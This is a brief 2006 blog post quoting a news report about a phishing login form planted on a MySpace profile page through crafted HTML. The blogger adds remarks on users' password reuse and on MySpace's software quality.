Tuesday, October 31, 2006

myspace phishing

I saw this on SlashDot yesterday about there's a hack out there that

"The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form."

What's scary is most users on myspace are just that, Users. They are not tech-savvy and they are certainly assumed to only know enough to pretty up their profile pages by surfing google to scrape some CSS code off of another website. So what if a hacker can get into a user's myspace account? Well from there, they can use the obtained email address and passwords to start shopping it around to other sites since most users don't keep multiple passwords and email addresses. Its a big gaping hole and well, myspace is just a poorly written piece of software.

No comments: